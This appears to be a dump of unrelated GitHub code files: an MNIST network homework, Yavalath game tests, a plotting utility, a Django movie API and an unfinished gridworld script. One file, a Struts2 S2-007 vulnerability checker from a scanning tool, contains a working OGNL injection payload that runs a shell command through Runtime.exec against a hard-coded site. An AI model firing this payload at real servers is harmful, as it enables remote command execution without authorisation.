= torch.FloatTensor(k, h1).uniform_(-self.alpha_2, self.alpha_2)\n self.b2 = torch.FloatTensor(1, k).uniform_(-self.alpha_2, self.alpha_2)\n\n self.params = [self.W0, self.b0, self.W1, self.b1, self.W2, self.b2]\n for param in self.params:\n param.requires_grad = True\n\n @problem.tag(\"hw3-A\")\n def forward(self, x: torch.Tensor) -> torch.Tensor:\n \"\"\"\n Pass input through F2 model.\n\n It should perform operation:\n W_2(sigma(W_1(sigma(W_0*x + b_0)) + b_1) + b_2)\n\n Args:\n x (torch.Tensor): FloatTensor of shape (n, d). Input data.\n\n Returns:\n torch.Tensor: LongTensor of shape (n, k). Prediction.\n \"\"\"\n # raise NotImplementedError(\"Your Code Goes Here\")\n x = torch.matmul(x, self.W0.T) + self.b0\n x = relu(x)\n x = torch.matmul(x, self.W1.T) + self.b1\n x = relu(x)\n x = torch.matmul(x, self.W2.T) + self.b2\n return x\n\n\n@problem.tag(\"hw3-A\")\ndef train(model: Module, optimizer: Adam, train_loader: DataLoader) -> List[float]:\n \"\"\"\n Train a model until it reaches 99% accuracy on train set, and return list of training crossentropy losses for each epochs.\n\n Args:\n model (Module): Model to train. Either F1, or F2 in this problem.\n optimizer (Adam): Optimizer that will adjust parameters of the model.\n train_loader (DataLoader): DataLoader with training data.\n You can iterate over it like a list, and it will produce tuples (x, y),\n where x is FloatTensor of shape (n, d) and y is LongTensor of shape (n,).\n\n Returns:\n List[float]: List containing average loss for each epoch.\n \"\"\"\n # raise NotImplementedError(\"Your Code Goes Here\")\n losses = []\n for i in range(32):\n loss_epoch = 0\n acc = 0\n for batch in tqdm(train_loader):\n x, y = batch\n x = x.view(-1, 784) # reshape to 784 x 1\n optimizer.zero_grad()\n logits = model.forward(x)\n preds = torch.argmax(logits, 1)\n acc += torch.sum(preds == y).item()\n loss = cross_entropy(logits, y)\n loss_epoch += loss.item()\n loss.backward()\n optimizer.step()\n\n print(\"Epoch \", i + 1)\n print(\"Loss:\", loss_epoch / len(train_loader.dataset))\n print(\"Acc:\", acc / len(train_loader.dataset))\n losses.append(loss_epoch / len(train_loader.dataset))\n if acc / len(train_loader.dataset) > 0.99:\n break\n return losses\n\n\ndef get_acc_test(test_loader, model):\n acc = 0\n loss_epoch = 0\n for batch in tqdm(test_loader):\n x, y = batch\n x = x.view(-1, 784)\n\n logits = model.forward(x)\n preds = torch.argmax(logits, 1)\n acc += torch.sum(preds == y).item()\n loss = cross_entropy(logits, y)\n loss_epoch += loss.item()\n\n l = loss_epoch / len(test_loader.dataset)\n a = acc / len(test_loader.dataset)\n return l, a\n\n\n@problem.tag(\"hw3-A\", start_line=5)\ndef main():\n \"\"\"\n Main function of this problem.\n For both F1 and F2 models it should:\n 1. Train a model\n 2. Plot per epoch losses\n 3. Report accuracy and loss on test set\n 4. Report total number of parameters for each network\n\n Note that we provided you with code that loads MNIST and changes x's and y's to correct type of tensors.\n We strongly advise that you use torch functionality such as datasets, but as mentioned in the pdf you cannot use anything from torch.nn other than what is imported here.\n \"\"\"\n (x, y), (x_test, y_test) = load_dataset(\"mnist\")\n x = torch.from_numpy(x).float()\n y = torch.from_numpy(y).long()\n x_test = torch.from_numpy(x_test).float()\n y_test = torch.from_numpy(y_test).long()\n # raise NotImplementedError(\"Your Code Goes Here\")\n train_dataset = TensorDataset(x, y)\n train_l = DataLoader(train_dataset, batch_size=128, shuffle=True)\n test_dataset = TensorDataset(x_test, y_test)\n test_l = DataLoader(test_dataset, batch_size=128, shuffle=True)\n # F1 model\n M1 = F1(h=64, d=784, k=10)\n opt = Adam(M1.params, lr=0.001)\n l1 = train(M1, opt, train_l)\n # print(l)\n\n # plot for F1 model\n epo_time = range(1, len(l1) + 1)\n plt.plot(epo_time, l1)\n plt.xlabel('epoch')\n plt.ylabel('loss')\n plt.title('Training Loss for F1 model')\n plt.show()\n\n # valid the test set\n ll, aa = get_acc_test(test_l, M1)\n print(\"Test dataset:\")\n print(\"Loss:\", ll)\n print(\"Acc:\", aa)\n\n # number of parameter\n num_of_param_F1 = 0\n for p in M1.params:\n num_of_param_F1 += np.prod(p.shape)\n print(\"There are\", num_of_param_F1, \"trainable parameters in model for F1.\")\n print(\"####################################################################\") # seperate line\n ###########################################################################\n # F2 model\n M2 = F2(h0=32, h1=32, d=784, k=10)\n opt = Adam(M2.params, lr=0.001)\n l2 = train(M2, opt, train_l)\n # print(l)\n\n # plot for F2 model\n epo_time = range(1, len(l2) + 1)\n plt.plot(epo_time, l2)\n plt.xlabel('epoch')\n plt.ylabel('loss')\n plt.title('Training Loss for F2 model')\n plt.show()\n\n # valid the test set\n ll, aa = get_acc_test(test_l, M2)\n print(\"Test dataset:\")\n print(\"Loss:\", ll)\n print(\"Acc:\", aa)\n\n # number of parameter\n num_of_param_F2 = 0\n for p in M2.params:\n num_of_param_F2 += np.prod(p.shape)\n print(\"There are\", num_of_param_F2, \"trainable parameters in model for F2.\")\n\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"poanchen1997/Machine_Learning","sub_path":"Neural Network_mnist/main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":8883,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"3419047765","text":"import unittest\nimport yavalath_engine\nfrom players import blue_player\nimport pprint\nimport collections\nimport pickle\nimport timeit\nimport numpy\nimport pathlib\nimport itertools\n\nclass TestDarrylPlayer(unittest.TestCase):\n def test_moves_to_vec(self):\n print(blue_player.moves_to_board_vector([]))\n print(blue_player.moves_to_board_vector([\"e1\"]))\n\n def test_vector_player(self):\n blue_player.vector_player([])\n\n\n\nclass TestConditions(unittest.TestCase):\n def test_win_conditions_board_4(self):\n game_so_far = ['e3', 'b1', 'e4']\n state = blue_player.GameState(game_so_far)\n def index_to_moves(index_iterable):\n return {state.options[index] for index in index_iterable}\n\n self.assertSetEqual(index_to_moves(state.white_winning_moves), set())\n self.assertSetEqual(index_to_moves(state.black_winning_moves), set())\n self.assertSetEqual(index_to_moves(state.white_losing_moves), {'e2', 'e5'}) # Winning conditions imply 2 losing conditions\n self.assertSetEqual(index_to_moves(state.black_losing_moves), set())\n self.assertSetEqual(index_to_moves(state.white_single_checks), {'e1', 'e6'}) # This is a new condition, but not a new check.\n self.assertSetEqual(index_to_moves(state.black_single_checks), set())\n self.assertSetEqual(index_to_moves(state.white_multi_checks), set())\n self.assertSetEqual(index_to_moves(state.black_multi_checks), set())\n\n def test_win_conditions_board_3(self):\n game_so_far = ['a1', 'b1', 'a2', 'b2', 'a4', 'b4']\n state = blue_player.GameState(game_so_far)\n def index_to_moves(index_iterable):\n return {state.options[index] for index in index_iterable}\n\n self.assertSetEqual(index_to_moves(state.white_winning_moves), {'a3'})\n self.assertSetEqual(index_to_moves(state.black_winning_moves), {'b3'})\n self.assertSetEqual(index_to_moves(state.white_losing_moves), {'a3'}) # Winning conditions imply 2 losing conditions\n self.assertSetEqual(index_to_moves(state.black_losing_moves), {'b3'}) # Winning conditions imply 2 losing conditions\n self.assertSetEqual(index_to_moves(state.white_single_checks), {'a5'}) # This is a new condition, but not a new check.\n self.assertSetEqual(index_to_moves(state.black_single_checks), {'b5'})\n self.assertSetEqual(index_to_moves(state.white_multi_checks), set())\n self.assertSetEqual(index_to_moves(state.black_multi_checks), set())\n\n def test_win_conditions_board_2(self):\n game_so_far = ['a1', 'b1', 'a2', 'b2', 'a4']\n state = blue_player.GameState(game_so_far)\n def index_to_moves(index_iterable):\n return {state.options[index] for index in index_iterable}\n\n self.assertSetEqual(index_to_moves(state.white_winning_moves), {'a3'})\n self.assertSetEqual(index_to_moves(state.black_winning_moves), set())\n self.assertSetEqual(index_to_moves(state.white_losing_moves), {'a3'}) # Winning conditions imply 2 losing conditions\n self.assertSetEqual(index_to_moves(state.black_losing_moves), {'b3'})\n self.assertSetEqual(index_to_moves(state.white_single_checks), {'a5'}) # This is a new condition, but not a new check.\n self.assertSetEqual(index_to_moves(state.black_single_checks), {'b4'})\n self.assertSetEqual(index_to_moves(state.white_multi_checks), set())\n self.assertSetEqual(index_to_moves(state.black_multi_checks), set())\n\n def test_win_conditions_board_1(self):\n game_so_far = ['a1']\n state = blue_player.GameState(game_so_far)\n\n def index_to_moves(index_iterable):\n return {state.options[index] for index in index_iterable}\n\n self.assertSetEqual(index_to_moves(state.white_winning_moves), set())\n self.assertSetEqual(index_to_moves(state.black_winning_moves), set())\n self.assertSetEqual(index_to_moves(state.white_losing_moves), set())\n self.assertSetEqual(index_to_moves(state.black_losing_moves), set())\n self.assertSetEqual(index_to_moves(state.white_single_checks), set())\n self.assertSetEqual(index_to_moves(state.black_single_checks), set())\n self.assertSetEqual(index_to_moves(state.white_multi_checks), set())\n self.assertSetEqual(index_to_moves(state.black_multi_checks), set())\n\n def test_win_conditions_empty_board(self):\n game_so_far = []\n state = blue_player.GameState(game_so_far)\n\n def index_to_moves(index_iterable):\n return {state.options[index] for index in index_iterable}\n\n self.assertSetEqual(index_to_moves(state.white_winning_moves), set())\n self.assertSetEqual(index_to_moves(state.black_winning_moves), set())\n self.assertSetEqual(index_to_moves(state.white_losing_moves), set())\n self.assertSetEqual(index_to_moves(state.black_losing_moves), set())\n self.assertSetEqual(index_to_moves(state.white_single_checks), set())\n self.assertSetEqual(index_to_moves(state.black_single_checks), set())\n self.assertSetEqual(index_to_moves(state.white_multi_checks), set())\n self.assertSetEqual(index_to_moves(state.black_multi_checks), set())\n\n def test_potential_moves(self):\n def test_game_so_far(game_so_far):\n board = yavalath_engine.HexBoard()\n state = blue_player.GameState(game_so_far)\n self.assertEqual(len(state.options), 61-len(game_so_far), \"The number of options is wrong for game: {}.\".format(game_so_far))\n options = [space_to_index[space] for space in state.options]\n self.assertEqual(state.white_potential_moves.shape, (62, 62-len(game_so_far))) # 62 rows for the spaces + \"1\", 61-len(game) columns for potential moves + the \"no move\"\n for board_space in range(61): # Always 61, since the board size is fixed\n for potential_move_index in range(len(state.options)): # Just the number of options\n expected = 1 if board_space == options[potential_move_index] else 0\n if board.spaces[board_space] in game_so_far: # a1\n expected = 1 if board_space in state.white_move_indices else -1\n self.assertEqual(state.white_potential_moves[board_space, potential_move_index], expected,\n \"Mismatch for board_space:{}, potential_move_index:{}\".format(board_space, potential_move_index))\n for board_space in range(61):\n potential_move_index = len(state.options)\n expected = 1 if board_space in state.white_move_indices else -1 if board_space in state.black_move_indices else 0\n self.assertEqual(state.white_potential_moves[board_space, potential_move_index], expected,\n \"Mismatch for 'no move' column, board_space:{}, potential_move_index:{}\".format(board_space, potential_move_index))\n for potential_move_index in range(len(state.options)): # Just the number of options\n board_space = 61\n self.assertEqual(state.white_potential_moves[board_space, potential_move_index], 1,\n \"Mismatch for 'offset' row, board_space:{}, potential_move_index:{}\".format(board_space, potential_move_index))\n\n def test_all_game_steps(game_so_far):\n for i in range(len(game_so_far)):\n test_game_so_far(game_so_far[0:i])\n\n # If I think there is a gam ewith the potential moves being incorrectly created, add that game here.\n test_all_game_steps(['a1', 'b2', 'a2', 'b1', 'c3'])\n game_so_far = ['g1', 'd5', 'e7', 'b5', 'e1', 'e3', 'i4', 'g4', 'b6', 'e4', 'f5', 'a5', 'c5', 'e8', 'c3', 'd3', 'f4', 'd2']\n test_all_game_steps(game_so_far)\n\n\ndef main1():\n win_C = blue_player.get_win_conditions()\n loss_C = blue_player.get_loss_conditions()\n pprint.pprint(win_C)\n pprint.pprint(win_C.shape)\n pprint.pprint(loss_C)\n pprint.pprint(loss_C.shape)\n print(blue_player.moves_to_board_vector([\"e1\", \"e2\", \"e3\", \"e4\"]).transpose())\n\n\nclass TestMoves(unittest.TestCase):\n\n def test_expected(self):\n player = lambda game: blue_player.vector_player2(game, depth=2)\n blocks = [\n # Pairs of game_so_far, expected_move\n (['a1', 'b1', 'a2', 'b2', 'a4'], 'a3'),\n (['a1', 'b1', 'a2', 'b2', 'a4', 'b4'], 'a3'),\n ]\n for game_so_far, expected_block in blocks:\n move, score = player(game_so_far)\n self.assertEqual(move, expected_block)\n\n\n\n\ndef main2():\n import logging\n blue_player.logger.setLevel(logging.DEBUG)\n game_so_far = ['g1', 'd5', 'e7', 'b5', 'e1', 'e3', 'i4', 'g4', 'b6', 'e4', 'f5', 'a5', 'c5', 'e8', 'c3', 'd3', 'f4', 'd2']\n #game_so_far = ['e8', 'a1', 'a2', 'a3', 'f1', 'a4', 'c1']\n #game_so_far = ['d3']\n print(\"Starting white spaces:\", sorted(game_so_far[::2]))\n print(\"Starting black spaces:\", sorted(game_so_far[1::2]))\n\n r = blue_player.vector_player2(game_so_far, depth=2, verbose=True)\n print(\"Result:\", r)\n\ndef main3():\n v1 = blue_player.get_linear_condition_matrix((1, 1, 1, 1))\n v2 = blue_player.get_win_conditions()\n print(\"v1 == v2:\", (v1 == v2).all())\n\n\n v1 = blue_player.get_linear_condition_matrix((1, 1, 1))\n v2 = blue_player.get_loss_conditions()\n print(\"v1 == v2:\", (v1 == v2).all())\n\n\nspace_to_index = {space: i for i, space in enumerate(yavalath_engine.HexBoard().spaces)}\n\n\ndef get_board_hash(white_move_indices, black_move_indices):\n key = (tuple(sorted(white_move_indices)), tuple(sorted(black_move_indices)))\n return hash(key)\n\ndef get_board_hash2(white_move_indices, black_move_indices):\n white_bitset = int()\n for move in white_move_indices:\n white_bitset |= (1 << move)\n black_bitset = int()\n for move in black_move_indices:\n black_bitset |= (1 << move)\n key = (white_bitset, black_bitset)\n return hash(key)\n\ndef main4():\n game_so_far = \"g1 d5 e7 b5 e1 e3 i4 g4 b6 e4 f5 a5 c5 e8 c3 d3 f4 d2 d4\".split()\n print(\"Starting white spaces:\", game_so_far[::2])\n print(\"Starting black spaces:\", game_so_far[1::2])\n\n white_move_indices = {space_to_index[move] for move in game_so_far[::2]}\n black_move_indices = {space_to_index[move] for move in game_so_far[1::2]}\n\n t = timeit.timeit(lambda: get_board_hash(white_move_indices, black_move_indices))\n print(\"get_board_hash: 1M iterations took {}s\".format(t))\n\n t = timeit.timeit(lambda: get_board_hash2(white_move_indices, black_move_indices))\n print(\"get_board_hash2: 1M iterations took {}s\".format(t))\n\ndef to_str(p):\n if len(p) == 1:\n return p[0].value\n else:\n white, black = p\n return \"{}, {}\".format(str(white) if white is None else white.value, str(black) if black is None else black.value)\n\ndef main5():\n signature_table, properties_table = pickle.load(open(\"final.dat\", 'rb'))\n\n for p in sorted([to_str(s) for s in properties_table]):\n print(p)\n index = numpy.nonzero(signature_table)\n print(\"Number of non-zero:\", len(index[0]))\n print(\"Done\")\n\ndef main6():\n properties = dict()\n t = timeit.timeit(lambda: blue_player.NextMoveClassifier.find_wins_and_checks_for_token_and_opp_arms_fast((-1, 0, 0), (0, -1, 0), -1))\n print(t)\n\ndef combine_results_simple(dirs = [r\"data\\laptop_files\", r\"data\\desktop_files\"]):\n \"\"\"This one assumes all sub-results use the same properites dictionary, and that the sentinel value is -1\"\"\"\n final_complete_tasks_filename = \"final_complete_tasks.dat\"\n final_tables_filename = \"final_tables.dat\"\n\n\n one_arm_possibilities = list(itertools.product([-1,0,1], [-1,0,1], [-1,0,1]))\n desired_tasks = set()\n for arm1, arm2 in itertools.product(one_arm_possibilities, one_arm_possibilities):\n task = (arm1, arm2)\n desired_tasks.add(task)\n\n # Load the summary table and complete tasks list, if they exist.\n if pathlib.Path(final_complete_tasks_filename).exists():\n final_complete_tasks = pickle.load(open(final_complete_tasks_filename, 'rb'))\n else:\n final_complete_tasks = set()\n if pathlib.Path(final_tables_filename).exists():\n combined_signature_table, combined_properties_table = pickle.load(open(final_tables_filename, 'rb'))\n else:\n combined_signature_table = None\n combined_properties_table = None\n\n # Join the results\n for dir in dirs:\n print(\"Looking at dir:\", dir)\n p = pathlib.Path(dir)\n for child in p.iterdir():\n if not child.is_file():\n continue\n print(\"Looking at child:\", child)\n if child.name == \"complete_tasks.dat\":\n done_tasks = pickle.load(open(child.as_posix(), 'rb'))\n final_complete_tasks = final_complete_tasks.union(set(done_tasks))\n pickle.dump(file=open(final_complete_tasks_filename, 'wb'), obj=final_complete_tasks)\n elif child.name.find(\"signature_table_worker\") == 0:\n print(\"Loading signature and properties tables from file:\", child.name)\n signature_table, properties_table = pickle.load(open(child.as_posix(), 'rb'))\n print(properties_table[0])\n if combined_properties_table is None:\n combined_properties_table = properties_table\n assert combined_signature_table is None, \"What happened?\"\n combined_signature_table = signature_table\n else:\n # I messed up... I cannot disambiguate a zero meaning \"not yet computed\" from a zero meaning the\n # first entry in the lookup table. Fortunately, I think all zeros mean \"GAME_OVER\" since the first\n # arm will always be (-1,-1,-1) for any task. I can pass once more over zeros at the end, I guess\n # Form a mapping from one property table to another\n print(\"Combining properties_tables.\")\n assert properties_table == combined_properties_table, \"Everyone should be using the same table.\"\n\n print(\"Computing index where values >= 0...\")\n index = numpy.where(signature_table >= 0)\n print(\"Updating combined index...\")\n combined_signature_table[index] = signature_table[index] # Assign all non-zero values\n # Should I feel confident that the mappings don't overlap?\n\n print(\"Saving final results to final.dat\")\n final = (combined_signature_table, combined_properties_table)\n pickle.dump(file=open(\"final.dat\", \"wb\"), obj=final)\n\n remaining = desired_tasks - final_complete_tasks\n print(\"All Done: {}, Remaining {}:\\n{}\".format(len(final_complete_tasks), len(remaining), remaining))\n\n print(\"Counting sentinel values...\")\n index = numpy.where(combined_signature_table == -1)\n print(\"Remaining sentinel values:\", len(index[0]))\n\n\ndef main7():\n signature_table, properties_table = pickle.load(open(\"signature_tables.dat\", \"rb\"))\n signatures = numpy.array([\n 303081869,\n 306723378,\n 44801543,\n 173941706,\n ])\n r = numpy.array(properties_table)[signature_table[signatures]]\n pprint.pprint(r)\n\ndef main8():\n signatures = [\n 303081869,\n 306723378,\n 44801543,\n 173941706,\n ]\n for signature in signatures:\n SIGNATURE_OFFSET = sum([3**i for i in range(18)]) # Add this to all signatures to make them >= 0.\n arms = blue_player.NextMoveClassifier.signature_index_to_arms(int(signature))\n print(signature, arms, SIGNATURE_OFFSET+blue_player.NextMoveClassifier.compute_signature(arms))\n signature, properties = blue_player.NextMoveClassifier.compute_signature_and_properties(arms)\n print(signature+SIGNATURE_OFFSET, properties)\n\ndef main9():\n game_so_far = ['g1', 'd5', 'e7', 'b5', 'e1', 'e3', 'i4', 'g4', 'b6', 'e4', 'f5', 'a5', 'c5', 'e8', 'c3', 'd3', 'f4', 'd2']\n # Moves by property:\n # SpaceProperies.WHITE_LOSE: ['c4', 'd6', 'f1', 'f3', 'f6']\n # ERROR: SpaceProperies.BLACK_SINGLE_CHECK: ['b1', 'b3', 'c6', 'd7', 'e6', 'g3'] # b3 is not a check... it is already blocked.\n # SpaceProperies.BLACK_WIN: ['d4']\n # SpaceProperies.BLACK_LOSE: ['c1', 'c2', 'd1', 'e2', 'e5', 'f2', 'f3']\n # ERROR: SpaceProperies.GAME_OVER: ['f7', 'h1']\n # SpaceProperies.WHITE_SINGLE_CHECK: ['d4', 'e5', 'f2']\n\n #game_so_far = ['e8', 'a1', 'a2', 'a3', 'f1', 'a4', 'c1']\n # Moves by property:\n # SpaceProperies.BLACK_LOSE: ['a5']\n # game_so_far = ['d3']\n\n move_stack = ['d2', 'b2', 'd4', 'f5', 'd5', 'd3', 'b5', 'c5', 'f1', 'e2', 'f2', 'a1', 'b1', 'c7', 'c6', 'e8', 'g6', 'f6', 'b6', 'd6', 'a3', 'g1']\n game_so_far = ['g2', 'c2', 'g7', 'i5', 'd1', 'e6', 'c4', 'a2', 'b3', 'e5', 'g4', 'g5', 'c1']\n yavalath_engine.Render(board=yavalath_engine.HexBoard(), moves=game_so_far).render_image(\"debug.png\")\n classifier = blue_player.NextMoveClassifier(game_so_far, verbose=True)\n classifier.compute_moves_by_property()\n\ndef regen_status():\n done_tasks = pickle.load(open(\"data/complete_tasks.dat\", 'rb'))\n print(\"{} Local Done:\\n{}\".format(len(done_tasks), done_tasks))\n desktop_done = pickle.load(open(r\"D:\\yavalath\\data/complete_tasks.dat\", 'rb'))\n print(\"{} Desktop Done:\\n{}\".format(len(desktop_done), desktop_done))\n sig_table, prop_table = pickle.load(open(\"data/signature_table_worker_0.dat\", \"rb\"))\n for index, p in enumerate(prop_table):\n print(index, list(i.value if i is not None else \"None\" for i in p))\n print(\"Max(sig_table):{}\".format(sig_table.max()))\n h = numpy.histogram(sig_table, bins=[-1,] + list(range(30)))\n print(h)\n\n\nif __name__ == \"__main__\":\n #main9()\n # tasks = [\n # ((1, 1, -1), (-1, 1, -1)),\n # ((1, 1, -1), (0, -1, 0)),\n # ((1, 1, -1), (1, -1, -1)),\n # ((1, 1, 0), (-1, 0, 1)),\n # ((1, 1, -1), (0, 0, 0)),\n # ((1, 1, -1), (1, 0, -1))\n # ]\n #tasks=[((1, 1, -1), (0, 0, 0)), ((1, 1, -1), (1, 0, -1))]\n #blue_player.NextMoveClassifier.compute_signature_table()\n combine_results_simple(dirs=[r\"data\",])\n #blue_player.NextMoveClassifier.compute_signature_table()\n #pprint.pprint(pickle.load(open(\"data/complete_tasks.dat\", \"rb\")))\n #regen_status()","repo_name":"adamsd5/yavalath","sub_path":"test_blue_player.py","file_name":"test_blue_player.py","file_ext":"py","file_size_in_byte":18456,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"74113782567","text":"import pandas as pd\nimport numpy as np\n\nclass Categorize(dict):\n # base is classifier = {'type':'quartiles', 'breaks': 4, 'colors':colors, 'radii': radii }\n # colors = (1,1,1) if tuple then solid single\n # colors = [(1,1,1),(1,1,1)] if list and size == 2 high and low\n # colors = [(1,1,1),(1,1,1),(1,1,1),...] if list and size > 2 the fixed colors\n # radii = 25 if not list then single\n # radii = [minRadii,maxRadii] if list and size == 2 high and low\n def getColors(self):\n if not 'color_list' in self:\n msg = 'call catigorize before calling getColors()'\n raise AttributeError(msg)\n\n return self['color_list']\n \n def getRadii(self):\n if not 'radii_list' in self:\n msg = 'call catigorize before calling getRadii()'\n raise AttributeError(msg)\n\n return self['radii_list']\n\n def getGradient(self):\n if not 'gradient_list' in self:\n msg = 'call catigorize before calling getGradient()'\n raise AttributeError(msg)\n\n return self['gradient_list']\n\n def categorize(self,_serial):\n\n # apply colors to value_list\n #print(type(_serial))\n if isinstance(_serial,list):\n _serial = pd.Series(_serial)\n\n if not 'colors' in self:\n self['colors'] = ['b' for i in range(0,4)]\n if not 'radii' in self:\n self['radii'] = [10 for i in range(0,4)]\n if not 'gradient' in self:\n self['gradient'] = [1.0 for i in range(0, len(self['colors']))]\n\n if not 'color_list' in self:\n self['color_list']=[]\n if not 'radii_list' in self:\n self['radii_list']=[]\n if not 'gradient_list' in self:\n self['gradient_list']=[]\n\n #print(type(_serial))\n self['radii_list']=[]\n\n self['color_list']=[]\n self['gradient_list']=[]\n\n breaks = []\n if self['type'] == 'quantiles':\n\n breaks = _serial.quantile([0.25, 0.5, 0.75])\n\n color_list = []\n rad_list = []\n grd_llist = []\n for v in _serial: # values\n\n i = 0\n clr = self['colors'][len(self['colors'])-1]\n rad = self['radii'][len(self['radii'])-1]\n grd = self['gradient'][len(self['gradient']) - 1]\n\n for c in breaks:\n\n if v < c:\n #print('v: ', v , ' < ' , c , ' is ', i)\n clr = self['colors'][i]\n rad = self['radii'][i]\n grd = self['gradient'][i]\n break\n\n i += 1\n\n self['radii_list'].append(rad)\n self['color_list'].append(clr)\n self['gradient_list'].append(grd)\n\n return self\n\ndef get_gradient(values, start_gradient=0, end_gradient=1.0):\n sz = len(values)\n\n step = (end_gradient - start_gradient) / sz\n gradient = np.arange(start_gradient, end_gradient, step)\n return gradient\n\ndef test_colorize():\n import pandas as pd\n print('############# condense test')\n vals = pd.Series([1, 2, 3, 4, 5, 6, 7, 8, 9, 10])\n # vals = [1, 2, 3, 4, 5, 6, 7, 8, 9, 10]\n\n\n gradient = get_gradient(vals,start_gradient=0.1)\n\n\n c_dict = {'type':'quantiles','colors':['r', 'g', 'b', 'y'],'gradient':gradient ,'alpha': 1.0 ,'radii':[10 , 25, 75, 100]}\n #c_dict = {'type': 'graduated', 'colors': ['r', 'g', 'b', 'y'],'gradient':gradient, 'alpha': 1.0, 'radii': [10, 25, 75, 100]}\n\n print('vals: ', vals)\n\n cat = Categorize(c_dict).categorize(vals)\n color = cat.getColors()\n radii = cat.getRadii()\n gradient = cat.getGradient()\n\n print('radii: ', radii)\n print('color: ', color)\n print('gradient: ', gradient)\n\ndef main():\n test_colorize()\n\nif __name__ == \"__main__\":\n # execute only if run as a script\n main()","repo_name":"citizenlabsgr/adopt-a-drain","sub_path":"notebook/lib/p3_Categorize.py","file_name":"p3_Categorize.py","file_ext":"py","file_size_in_byte":3841,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"42341782192","text":"#!/usr/bin/env python3\n\nfrom app.lib.utils.common import get_capta\nfrom app.lib.utils.request import request\n\nclass S2_007_BaseVerify:\n def __init__(self, url):\n self.info = {\n 'name': 'Struts2 S2-007漏洞,又名CVE-2012-0838漏洞',\n 'description': 'Struts2 S2-007漏洞可执行任意命令, 影响范围为: Struts 2.0.0 - Struts 2.2.3',\n 'date': '2011-09-03',\n 'type': 'RCE'\n }\n self.url = url\n self.capta = get_capta()\n self.check_payload = {\n 'name': \"1\",\n 'email': \"7777777@qq.com\",\n 'age': '''\\' + (#_memberAccess[\"allowStaticMethodAccess\"]=true,#foo=new java.lang.Boolean(\"false\") ,#context[\"xwork.MethodAccessor.denyMethodExecution\"]=#foo,@org.apache.commons.io.IOUtils@toString(@java.lang.Runtime@getRuntime().exec(''' + '\\'' +'echo ' + self.capta + '\\'' + ''').getInputStream())) + \\''''\n }\n\n def run(self):\n \"\"\"\n 检测是否存在漏洞\n\n :param:\n\n :return str True or False\n \"\"\"\n\n try:\n if not self.url.startswith(\"http\") and not self.url.startswith(\"https\"):\n self.url = \"http://\" + self.url\n if '.action' not in self.url:\n self.url = self.url + '/user.action'\n check_req = request.post(self.url, data = self.check_payload)\n if self.capta in check_req.text and check_req.status_code == 200 and len(check_req.text) < 100:\n return True\n else:\n return False\n except Exception as e:\n print(e)\n return False\n finally:\n pass\n\nif __name__ == \"__main__\":\n S2_007 = S2_007_BaseVerify('http://jsfw.kydls.com')\n S2_007.run()","repo_name":"OPSTime/linbing","sub_path":"flask/app/plugins/Struts2/S2_007.py","file_name":"S2_007.py","file_ext":"py","file_size_in_byte":1766,"program_lang":"python","lang":"en","doc_type":"code","dataset":"github-code","pt":"53"} +{"seq_id":"74516055529","text":"from rest_framework.views import APIView\nfrom rest_framework.response import Response\nfrom rest_framework.authentication import TokenAuthentication\nfrom rest_framework.permissions import IsAuthenticated\n\nfrom imdb_api.models.movie_model import Movie\nfrom imdb_api.serializers.movie_serializer import MovieSerializer\n\n\nclass MovieView(APIView):\n \"\"\"\n This class is used to get,add, edit and delete movies.\n \"\"\"\n authentication_classes = [TokenAuthentication]\n permission_classes = [IsAuthenticated]\n\n def get(self, request, pk=None):\n if pk is not None:\n movie = Movie.objects.get(pk=pk)\n serializer = MovieSerializer(movie)\n return Response(serializer.data)\n \n elif pk is None:\n print(request.user.username)\n movie = Movie.objects.all()\n serializer = MovieSerializer(movie, many=True)\n return Response(serializer.data)\n else:\n return Response(\"Movie not found\")\n \n def post(self, request):\n if request.user.is_authenticated and request.user.is_staff:\n serializer = MovieSerializer(data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n else:\n return Response(serializer.errors)\n else:\n \n return Response(\"You are not authorized to add movie\")\n def put(self, request, pk):\n if request.user.is_authenticated and request.user.is_staff:\n movie = Movie.objects.get(pk=pk)\n serializer = MovieSerializer(movie, data=request.data)\n if serializer.is_valid():\n serializer.save()\n return Response(serializer.data)\n else:\n return Response(serializer.errors)\n \n else:\n return Response(\"You are not authorized to update movie\")\n def delete(self, request,pk):\n if request.user.is_authenticated and request.user.is_staff:\n movie = Movie.objects.get(pk=pk)\n movie.delete()\n return Response(\"Movie Deleted\")\n else:\n return Response(\"You are not authorized to delete movie\")","repo_name":"MarcinIgna/imdb-django-api","sub_path":"imdb_api/views/movie_serializer_view.py","file_name":"movie_serializer_view.py","file_ext":"py","file_size_in_byte":2243,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} +{"seq_id":"2974385432","text":"import matplotlib.pyplot as plt\r\nimport random\r\nimport sys\r\n\r\n\"\"\" PARAMETERS \"\"\"\r\n\r\n# Actions left, right, up, and down which we label via coord change.\r\nactions = [[1,0],[-1,0],[0,1],[0,-1]]\r\n\r\n# Have states in 11 x 11 grid, marked 0 to 10.\r\nstates = [[i,j] for i in range(11) for j in range(11)]\r\n\r\n# We combine actions and states into a list of pairs.\r\nstate_actions = [[state,action] for state in states for action in actions]\r\n\r\n# We set our default start and goal as the state (note these will be random)\r\nstart = [1,5]\r\ngoal = [10,5]\r\n\r\n# We set our greedy parameter and our discounting factor\r\nepsilon = 0.01\r\ngamma = .9\r\n# The below formats our walls.\r\nwalls = [[[5, 5], [5, 6], [5, 7], [5, 8], [5, 9], [5, 10]],\r\n [[7, 4], [7, 5], [7, 6], [7, 7], [7, 8], [7, 9]],\r\n [[1, 3], [1, 4], [1, 5], [1, 6], [1, 7], [1, 8]],\r\n [[9, 0], [9, 1], [9, 2], [9, 3], [9, 4], [9, 5], [9, 6], [9, 7]],\r\n [[3, 1], [3, 2], [3, 3], [3, 4], [3, 5], [3, 6], [3, 7]]]\r\n\r\nX = [2*i+1 for i in range(5)]\r\nfor elem in walls:\r\n for i in elem:\r\n states.remove(i)\r\n for a in actions:\r\n state_actions.remove([i,a])\r\n\r\n# The below loop removes any state action combinations that lead to a state \r\n# outside of our 11 x 11 grid. We then create a state-action values list which \r\n# matches this list one to one.\r\nfor 